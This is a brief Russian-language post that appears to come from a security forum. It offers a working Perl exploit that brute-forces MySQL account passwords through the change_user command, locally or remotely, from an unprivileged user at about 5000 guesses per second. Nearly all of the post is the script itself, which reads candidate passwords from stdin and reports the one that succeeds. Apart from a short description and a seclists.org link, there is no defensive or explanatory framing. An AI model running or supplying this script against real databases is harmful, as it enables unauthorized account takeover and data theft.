Эксплоит для быстрого перебора паролей (локально и удаленно) MySQL из-под непривилегированного пользователя со скоростью около 5000 паролей в секунду. Основывается на функции change_user Описание: Perl-скрипт: Код: use Net::MySQL; $|=1; my $mysql = Net::MySQL->new( hostname => '192.168.2.3', database => 'test', user => "user", password => "secret", debug => 0, ); $crackuser = "crackme"; while(<stdin>) { chomp; $currentpass = $_; $vv = join "\0", $crackuser, "\x14". Net::MySQL::Password->scramble( $currentpass, $mysql->{salt}, $mysql->{client_capabilities} ) . "\0"; if ($mysql->_execute_command("\x11", $vv) ne undef) { print "[*] Cracked! --> $currentpass\n"; exit; } } Пример сессии: Ссылка: seclists.org